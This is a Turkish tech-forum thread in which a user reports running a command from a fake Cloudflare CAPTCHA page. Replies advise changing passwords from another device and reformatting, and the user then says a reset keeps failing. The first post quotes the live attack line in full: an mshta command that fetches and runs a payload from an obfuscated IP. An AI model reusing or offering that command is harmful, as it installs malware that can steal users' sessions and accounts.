Cloudflare robot doğrulamasında scam mi var?

dagtalha678

Hectopat
Daha fazla  
Az önce bir siteye giriş yapmaya çalışırken klasik Cloudflare robot doğrulaması geldi ve benim de dalgınlığıma geldi. Çalıştır da mshta http://146.0x46.100.0x73/djhb.wma komutunu çalıştırdım. Yaptığım şeyin farkına vararak hemen Görev Yöneticisi'ni kontrol ettim; anormal bir durum yok gibiydi. 3-4 dakika sonra bilgisayarı yeniden başlattım ve Malwarebytes taraması yaptım; hiçbir şey bulamadı. Chrome’da AdGuard ve Privacy Badger eklentileri yüklü. Ekstra olarak Free Download Manager kullanıyorum. Arka planda benim göremediğim şekilde bir şey yüklenip kurulmadıysa eğer, hiçbir şeyin yüklenmediğinden eminim. Ne yapmam gerekiyor? Sıkıntılı bir durum olur mu acaba?

Son düzenleyen: Moderatör:
Hocam cloudflare arayüzü sıklıkla taklit ediliyor. Bu şekilde uzaktan çalıştırılmış bir kodun zararlı olmama ihtimali yok, antivirüsler fark etmese bile kesinlikle bir virüs şu an bilgisayarınızda çalışıyor.

Cookie kopyalamalarına karşı hesap şifrelerinizi başka bir cihaz üzerinden değiştirin ve bilgisayarınıza format atın.

Hocam Cloudflare arayüzü sıklıkla taklit ediliyor. Bu şekilde uzaktan çalıştırılmış bir kodun zararlı olmama ihtimali yok, antivirüsler fark etmese bile kesinlikle bir virüs şu an bilgisayarınızda çalışıyor.

Cookie kopyalamalarına karşı hesap şifrelerinizi başka bir cihaz üzerinden değiştirin ve bilgisayarınıza format atın.

Peki formatı bilgisayar üzerinden hiç USB vs kullanmadan yapsam bir sıkıntı olur mu?

Problem yok hocam, bilgisayarınızda aktif girili olan hesapların şifresini değiştirmeniz neyle format attığınızdan çok daha önemli bir durum. Geçmiş olsun.
teşekkür ederim

Bilgisayarı sıfırlayamıyorum 3-4 kere denedim böyle oldu bu neden olur acaba durumla bir alakası var mıdır?

Dosya Ekleri

• 20250908_154735.jpg
    20250908_154735.jpg
    137 KB · Görüntüleme: 17
Son düzenleme:

Technopat Haberler

Yeni konular

Geri
Yukarı